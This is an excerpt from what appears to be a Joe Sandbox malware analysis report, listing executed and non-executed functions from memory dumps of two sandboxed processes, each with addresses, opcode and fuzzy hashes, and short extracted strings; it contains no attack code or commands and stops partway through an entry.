Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e0c5cef3bf599c9a2059db4483ea06b8f01eeb16745193d3aea9f0304056873
Instruction ID: 49abd2885a6d923f527a1638a4d3a19dde8063c98e96b40c11b806bf4238490d
Opcode Fuzzy Hash: 2e0c5cef3bf599c9a2059db4483ea06b8f01eeb16745193d3aea9f0304056873
Instruction Fuzzy Hash: 9A017530A4EA4D5FEB62A774846D5A97BE0EF49300F0604F6D41CC70E6D938A5448701

Function 00007FFD9B8B0EA0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2288f4f4d9d0a77c2cd4b9a7900cb506bd1f8ec724c008687cb5db8c8b48a973
Instruction ID: df8a85f80625aceb0bcaa4571178bd9e845b515d82d3fa0283ed29caab966f56
Opcode Fuzzy Hash: 2288f4f4d9d0a77c2cd4b9a7900cb506bd1f8ec724c008687cb5db8c8b48a973
Instruction Fuzzy Hash: 39011D30E2991E8EEBA1FBB9C4585BA76E4FF1C304F014976D41CD30A5DB34A2848A41

Function 00007FFD9B880610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f323dbbe135010f766fba166990e9a4f638a2dfb9f3353a835ce24352549ee98
Instruction ID: f4cefd4f8c3c694f0e2a2ecad1bc4f074a252db73ff15af4f69fc681dcf15696
Opcode Fuzzy Hash: f323dbbe135010f766fba166990e9a4f638a2dfb9f3353a835ce24352549ee98
Instruction Fuzzy Hash: 7E018130A1990E8BEB58EFA4C4696B977E0FF1C305F11087ED42EC21E5DF35A690CA01

Function 00007FFD9B880608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91065e1eadbc29e7687a536d4eac95f0c59192b7acb41372e1008df28987ad2
Instruction ID: 1823fad3280f31c88e245d21c3c468879aed3a08cb0e4334c4ddd071f31b86cd
Opcode Fuzzy Hash: c91065e1eadbc29e7687a536d4eac95f0c59192b7acb41372e1008df28987ad2
Instruction Fuzzy Hash: 2E016D30A1590ECBEB69FFA4C4686B972A0FF1C305F51087ED42EC21E5DE35A650CA00

Function 00007FFD9B88A4D8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d953221d29ec8643ba8b657c69b05baf5d0fcc8e49935f534dc9280e085cf907
Instruction ID: e5705308e37deb0d3e548d21a16a62d56fe0755c81781d07850ca6073e4c2ee9
Opcode Fuzzy Hash: d953221d29ec8643ba8b657c69b05baf5d0fcc8e49935f534dc9280e085cf907
Instruction Fuzzy Hash: 46F08130E1A50EAAEF69EB64C4646F976A0FF08308F1104BEE42ED20E5DE356250C640

Function 00007FFD9B881C2D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aadecc6271854d417b7ffca69b7033a789b1874e9eaf25c15882606bebed10a9
Instruction ID: e6cc491cedc774a586982f664b3bc9e57d157932694c6c6817888cda73fdb372
Opcode Fuzzy Hash: aadecc6271854d417b7ffca69b7033a789b1874e9eaf25c15882606bebed10a9
Instruction Fuzzy Hash: 88016230A0AA4E8FDBA5EF64C4A51A97BA1FF59300F45007ED419C61A1DA75A550C741

Function 00007FFD9B8805D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dd0ef0a0087da2f29f56ddeebb90e2348dee6bc54f8f4775d07e9b0bd742ab4
Instruction ID: 5e32313005833a7c92134306ca9090ad84e8278a72ebff3045ebf2e05b53a878
Opcode Fuzzy Hash: 5dd0ef0a0087da2f29f56ddeebb90e2348dee6bc54f8f4775d07e9b0bd742ab4
Instruction Fuzzy Hash: C6F0C230A0A90E8FEBA8EF6494A56FA37A1FF0D308F41007AE81DC20A1CE35A650C740

Function 00007FFD9B8811C0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c0999ba04620598eb6306ae584a02460a5e9863a50f09b573abdee08f2d706b
Instruction ID: e3df3e82a9817e298d39b7bcc5ca2e674da4a8a02159ae4e363f39db895fade2
Opcode Fuzzy Hash: 9c0999ba04620598eb6306ae584a02460a5e9863a50f09b573abdee08f2d706b
Instruction Fuzzy Hash: 7AF0A470E1A94F4BEBA5EBE488692F976E0BF5D204F01143AE42EC61E1EF3416548640

Function 00007FFD9B88B244 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7525ecd23a2943406631cfb7940773931bb369972647ec6f0f00e7c1f0892e9
Instruction ID: 124c636f9767faa8d98a92f317a368543622679a360be6831148a363e736de36
Opcode Fuzzy Hash: e7525ecd23a2943406631cfb7940773931bb369972647ec6f0f00e7c1f0892e9
Instruction Fuzzy Hash: 3DF06930A0A91D8FDBA5EB14C455BE9B3B5FF9C300F1181A6C01CD7165CE35AA818B80

Function 00007FFD9B88B93A Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe51990a6c79365b7189343f7da2ad6e2528ca8fdd9e5f681177d326e483a46
Instruction ID: abef52ee51c4dbc4cd2c2f7e6b95bb98db96e0e6cc3e50f38c40a9a57b70e150
Opcode Fuzzy Hash: bfe51990a6c79365b7189343f7da2ad6e2528ca8fdd9e5f681177d326e483a46
Instruction Fuzzy Hash: FFF01230A1A95E8BEBA4AF6488642FD76E4FF59300F01057AD829C21A1EB7566548781

Function 00007FFD9B882749 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93621629faaae4dae04e6931da721c87acaed9442eaae11d8f89d8c5ba1c765
Instruction ID: c671ebd05e149540d039bbe6ad4530e9f0f5f0f01775404ee6d8d57ea2add40a
Opcode Fuzzy Hash: a93621629faaae4dae04e6931da721c87acaed9442eaae11d8f89d8c5ba1c765
Instruction Fuzzy Hash: 3EF0F63090E78E8FDB2AAF6488682E93B70FF06205F4604FFD419C60E2DB399514CB01

Function 00007FFD9B8827BD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0281aa14906b301f12135b5c8c359ff9788ba19fff8d9b579077c8b9b36b44
Instruction ID: 48ad45ea0f07030cc07ada6b470e64fa3eb67ecc20f863843e5015c639a27635
Opcode Fuzzy Hash: ae0281aa14906b301f12135b5c8c359ff9788ba19fff8d9b579077c8b9b36b44
Instruction Fuzzy Hash: 25F0B430A1EA8ECFEB69AFA4C8251F93BA0FF09304F4504BED419C61E6DB39A554C741

Function 00007FFD9B882344 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb39d8d73b7a4ee641e99d8b1135dcb105f8b5051ff7251977619a170b99f9a
Instruction ID: 9a6267737c108220566ba03323ad2a31244bc8f18edb0842a74b80161a1e4c66
Opcode Fuzzy Hash: efb39d8d73b7a4ee641e99d8b1135dcb105f8b5051ff7251977619a170b99f9a
Instruction Fuzzy Hash: 7CF08230A0E60E9FEB60EF40C8647A877B1EF55300F1545FAC05DC72A2CE786A888B40

Non-executed Functions

Function 00007FFD9B88EB24 Relevance: 8.9, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

C, xrefs: 00007FFD9B88EF48
%, xrefs: 00007FFD9B88FC19
h, xrefs: 00007FFD9B88FB3C
}, xrefs: 00007FFD9B88EFB0
{, xrefs: 00007FFD9B88DF15
V, xrefs: 00007FFD9B88FB0E
u, xrefs: 00007FFD9B88FB01

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: %$C$V$h$u${$}
API String ID: 0-1921298197
Opcode ID: 697a69dfe20ba82918a245030de2deff618527a3d4f3c3cf18381f3a55a90141
Instruction ID: 21c40a2c8a810a73f6947c969cdcc5aad9f99fe2b36d80667ada71153cb6507b
Opcode Fuzzy Hash: 697a69dfe20ba82918a245030de2deff618527a3d4f3c3cf18381f3a55a90141
Instruction Fuzzy Hash: B051E870E0966E8FEB74DF54C8A4BF9B6B1AF58301F0141FAD05DA66A1CB785A80DF40

Function 00007FFD9B89097E Relevance: 6.4, Strings: 5, Instructions: 176COMMON

Download Yara Rule

Strings

[, xrefs: 00007FFD9B890EC2
", xrefs: 00007FFD9B8910C2
}, xrefs: 00007FFD9B8909CA
, xrefs: 00007FFD9B89097E
+, xrefs: 00007FFD9B890C44

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: $"$+$[$}
API String ID: 0-4214201918
Opcode ID: b7d94aa732d5330ad09ae4992e3d4f050c256a3143809f35f8adf5aadc483678
Instruction ID: 9780d23a8335d2e3808952ee4b015458374621d3af6493fc4a3cd0e9a3633cdf
Opcode Fuzzy Hash: b7d94aa732d5330ad09ae4992e3d4f050c256a3143809f35f8adf5aadc483678
Instruction Fuzzy Hash: 0581D770E1962D9FEB64DFA4C4A57FDBAB1BF48305F1140BAD04DA7291CA385A84DF10

Function 00007FFD9B89196E Relevance: 5.2, Strings: 4, Instructions: 172COMMON

Download Yara Rule

Strings

Z\, xrefs: 00007FFD9B891A1E
D\, xrefs: 00007FFD9B891989
N\, xrefs: 00007FFD9B8919CF
d\, xrefs: 00007FFD9B891A69

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: D\$N\$Z\$d\
API String ID: 0-237293203
Opcode ID: d9aa5a0498ba3c7ca2328a17d658297affbd04b8f61b2e34f20e37a14bd7880f
Instruction ID: 9ac849f192cce7277148de110e45408192f88e4c41b0f90ee33778c1eac0a694
Opcode Fuzzy Hash: d9aa5a0498ba3c7ca2328a17d658297affbd04b8f61b2e34f20e37a14bd7880f
Instruction Fuzzy Hash: 4651ED70A09A1D8FDFA4EF58C8A5BA9B7F1FF98305F1041A9D01DD7296CE34A981CB00

Function 00007FFD9B88E167 Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

R, xrefs: 00007FFD9B88E171
I, xrefs: 00007FFD9B88E268
g, xrefs: 00007FFD9B88E2CC
:, xrefs: 00007FFD9B88E1F5

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: :$I$R$g
API String ID: 0-989302672
Opcode ID: 76808ed6c840c17c7b780187576c8173de7b4b7b1ad1da11ea33bc781a2999c9
Instruction ID: 26790e3b5bc1e516433e086ea522f69075799c7154ccf2547bd650d5dbdbad23
Opcode Fuzzy Hash: 76808ed6c840c17c7b780187576c8173de7b4b7b1ad1da11ea33bc781a2999c9
Instruction Fuzzy Hash: B651A070E05A6D8FDBA5DF58C894BE9B7B1EB58301F1041EAD45DA2291CB74ABC1CF40

Function 00007FFD9B88DFAE Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD9B88E029
1, xrefs: 00007FFD9B88ED34
K, xrefs: 00007FFD9B88DFF3
$, xrefs: 00007FFD9B88DFB8

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: "$$$1$K
API String ID: 0-1999501151
Opcode ID: 83db4d6ceb3e71761cc4af19ae70bccf9f01702589dd28f5be0a6b2fc8f596e0
Instruction ID: e955d93374b87cbb120ec9e9e8aa2bc91f5ead402480a86db4c2b9afafc7f4c1
Opcode Fuzzy Hash: 83db4d6ceb3e71761cc4af19ae70bccf9f01702589dd28f5be0a6b2fc8f596e0
Instruction Fuzzy Hash: ED310AB0E0A66E8FEB78DF54C8947E9B7B1EB58311F1041AAD40DA6691CB385A84CF41

Function 00007FFD9B890D4D Relevance: 5.1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

{, xrefs: 00007FFD9B890F7C
$, xrefs: 00007FFD9B890FC6
*, xrefs: 00007FFD9B890D57
-, xrefs: 00007FFD9B890F89

Memory Dump Source

Source File: 0000000A.00000002.1754380161.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: $$*$-${
API String ID: 0-2552764092
Opcode ID: a47f82aba10856227749b0eef5a4166fd6b6fd8c65524167d61c76899314cdde
Instruction ID: 1a0f2c861f9ca2cf7ed984695e26c5fd4f473b613666d8ebed0205f9883fa0db
Opcode Fuzzy Hash: a47f82aba10856227749b0eef5a4166fd6b6fd8c65524167d61c76899314cdde
Instruction Fuzzy Hash: B831D670E0922D8FEF68DF94C4A47BDBAB1AB58301F1140BAD00DA7291CB385A84CF41

Analysis Process: ITlIQtTGhEyfMRHaLp.exePID: 8036, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B883545 Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

Y_H, xrefs: 00007FFD9B8835CD

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: Y_H
API String ID: 0-219585648
Opcode ID: 8965b01380d04bd53c317be2dba8fb8cfdc4e1a0e5079875df075c9c547dd6f1
Instruction ID: adb4277104bf36f7fa316b3c833abcc66951d605d127788a1e3b3fefffc22465
Opcode Fuzzy Hash: 8965b01380d04bd53c317be2dba8fb8cfdc4e1a0e5079875df075c9c547dd6f1
Instruction Fuzzy Hash: B3A1E171A1994E8FEB98EBA8C8657EDBBE1FF59340F40007AD01DD32D6DB7868018741

Function 00007FFD9B893555 Relevance: 4.1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

Strings

4r, xrefs: 00007FFD9B89368E
Nr, xrefs: 00007FFD9B89377A
Nr, xrefs: 00007FFD9B89394D

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b891000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: 4r$Nr$Nr
API String ID: 0-3193503180
Opcode ID: 7cf3a4d7b0557a69689224985be02fd6620cf2c2dcbbee3d320a63e6b82e93d7
Instruction ID: 9913121d87d12409675bcdb3fa0c8601d62336662e5cd2ab6ec93cdc2e9585fc
Opcode Fuzzy Hash: 7cf3a4d7b0557a69689224985be02fd6620cf2c2dcbbee3d320a63e6b82e93d7
Instruction Fuzzy Hash: E9C19770E1951D8FEFA4EB98C8657EDBBB1FF59300F5141AAD00DE32A1DA346A858F40

Function 00007FFD9B880FB0 Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9B880D21
H, xrefs: 00007FFD9B880F1F

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: H$H
API String ID: 0-136785262
Opcode ID: b529ac7cfdf9bc399b0986d366f82e7c6ce19219b7e0a7824199f341f62a6bc7
Instruction ID: de9317785d482176030b97096d9e7f4a8335afa677870324177f8c7d2774a2b7
Opcode Fuzzy Hash: b529ac7cfdf9bc399b0986d366f82e7c6ce19219b7e0a7824199f341f62a6bc7
Instruction Fuzzy Hash: C281B671E19A0E4FEB68EB58C865BEDB7A1FF58310F0042B9D01DD71E6DE346A468B40

Function 00007FFD9B88DF01 Relevance: 2.5, Strings: 2, Instructions: 48COMMON

Download Yara Rule

Strings

`, xrefs: 00007FFD9B88E353
{, xrefs: 00007FFD9B88DF15

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B88A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b88a000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: `${
API String ID: 0-2175359776
Opcode ID: 48016276d38f7d853b3def24705c37091ca6c2cc10a3f12e4b6fa209f2985bf5
Instruction ID: cc2196a48e9ca2a374db2a63d83d8389545b0e55747bbf285a08e790f4d96f0c
Opcode Fuzzy Hash: 48016276d38f7d853b3def24705c37091ca6c2cc10a3f12e4b6fa209f2985bf5
Instruction Fuzzy Hash: 9621EA70A0966E8FEB78DF44C8A47A976B1BF58301F0041F9D41DA6691CB785E80CF41

Function 00007FFD9B8918AD Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

n\, xrefs: 00007FFD9B891B60

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b891000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: n\
API String ID: 0-3537540548
Opcode ID: 5af62e3acb2b32ec16175cb6cb244b91b93b3f568a800a432c045f4bee335016
Instruction ID: 6cc7e03ce270548c1d3602847405ab69c228f04a20d0e01c4cbc0cfafdb44356
Opcode Fuzzy Hash: 5af62e3acb2b32ec16175cb6cb244b91b93b3f568a800a432c045f4bee335016
Instruction Fuzzy Hash: 42415C30E0D94E8FEF68EBA4C4656BD7BA2EF58314F01057ED01AD72E5DA386A418B40

Function 00007FFD9B8937CD Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Zr, xrefs: 00007FFD9B8937D9

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b891000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: Zr
API String ID: 0-4206875044
Opcode ID: 00344f6f4fe43f4d075d9bf97436f8950350392aa9465003b1130c54700f08ec
Instruction ID: 768b2d2db7d355a31af3238ca98e1a3e8ff1f6b20bf1358cf219cf16d10a36f0
Opcode Fuzzy Hash: 00344f6f4fe43f4d075d9bf97436f8950350392aa9465003b1130c54700f08ec
Instruction Fuzzy Hash: B6111871E0911E9EDF60DFA9C4546ECBAF1EB18301F118176F019E22A1DB385B848F10

Function 00007FFD9B8913F3 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

(, xrefs: 00007FFD9B89140A

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b891000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: af2deaae405eed343623d08dd51c9d5885417f16e01adf69523646f0cc4f71d8
Instruction ID: f6f8fa7cfac94a15767ba04312fa8fbd59bcd08fd59798473d68a099b48f93b2
Opcode Fuzzy Hash: af2deaae405eed343623d08dd51c9d5885417f16e01adf69523646f0cc4f71d8
Instruction Fuzzy Hash: 89D01274D0C21D8BEB14EF90C8A05ED77F1BF14300F001129901A5B2C5CB742644CB40

Function 00007FFD9B892C35 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b891000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6932006dec3bfa8e5e9dc018bc360cd71f84c8b9c3d034286f3484a380ebb179
Instruction ID: f8eaf32800f7ce054231361d9bfb72701285277d06e20caa3a3bedf32d2e7ccd
Opcode Fuzzy Hash: 6932006dec3bfa8e5e9dc018bc360cd71f84c8b9c3d034286f3484a380ebb179
Instruction Fuzzy Hash: BC51C952A0F7DA4FEB669BB84C795A87FB0EF16214B0901FBD0D8CB0E7D91865098341

Function 00007FFD9B892CF8 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b891000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51090b83646763b6a929d5fafdd6bc20e83fadddf061f236e08587c644df85f9
Instruction ID: 1ddeeb3b190cac17a65bda7938eb88971ca56e5eaa2209a2a0f572878505cdba
Opcode Fuzzy Hash: 51090b83646763b6a929d5fafdd6bc20e83fadddf061f236e08587c644df85f9
Instruction Fuzzy Hash: A1114221A0E7C94EEB669BB448695657FB0EF16204B0905FFD498CB0E7D9185618C352

Function 00007FFD9B88D2F5 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B88A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b88a000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3236e2e72efde579eb3a1919e6ce6b01982588bc56ce8b2eef316f8c5b85b3e1
Instruction ID: 9c11b11fe104e73ec9c18bf0272a614f64140895ceeb4bd712b6b74bb660ffb0
Opcode Fuzzy Hash: 3236e2e72efde579eb3a1919e6ce6b01982588bc56ce8b2eef316f8c5b85b3e1
Instruction Fuzzy Hash: 40E14C71E19A5D8FEB68EB98C8A57B8B7B1FF58300F0401BED01DD72A6DA346941CB41

Function 00007FFD9B88051D Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78623f0db667c621b186e8e1ff5f7ced68ebdb75a6d1030c81edb681344095ae
Instruction ID: 85c0c4395a6e80e2b55f2b8e1a2aaf11de16d5ac9a5d6429d22e807a07598a3c
Opcode Fuzzy Hash: 78623f0db667c621b186e8e1ff5f7ced68ebdb75a6d1030c81edb681344095ae
Instruction Fuzzy Hash: 54B14B43B0FAD64BE72573ADB8751E93F50DF8172570901F7E0AC8A0E7EC14694A8295

Function 00007FFD9B8805A0 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c8d837b701152cdb6bf5f4441c6239460a15ce2b00527db0b38eae15f823d1
Instruction ID: 03bebe03ebb4234769562e9ee4bb1c3570057a6e7f9cc4760fbb93102c9174b2
Opcode Fuzzy Hash: 34c8d837b701152cdb6bf5f4441c6239460a15ce2b00527db0b38eae15f823d1
Instruction Fuzzy Hash: 11916C43B0FAD64BE72673AC7C791E92F50EF8566470D01F7E0E88A0E7EC2469468285

Function 00007FFD9B8805ED Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0dd836ad1f3dd937551238aff54398a35207f99afe553cab0b3f30929bf0142
Instruction ID: 9335ec1a506a0136a9f33f667feff2f87d0b6863ec9a1d6718f205f685dd73a0
Opcode Fuzzy Hash: a0dd836ad1f3dd937551238aff54398a35207f99afe553cab0b3f30929bf0142
Instruction Fuzzy Hash: A7915C43B0FAD64FE72573AD7C791E93F50EF8562470D01F7E0A88A0E7EC2869468295

Function 00007FFD9B880638 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2371350600.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_ITlIQtTGhEyfMRHaLp.jbxd

Similarity

API ID:
String ID:
API String ID:
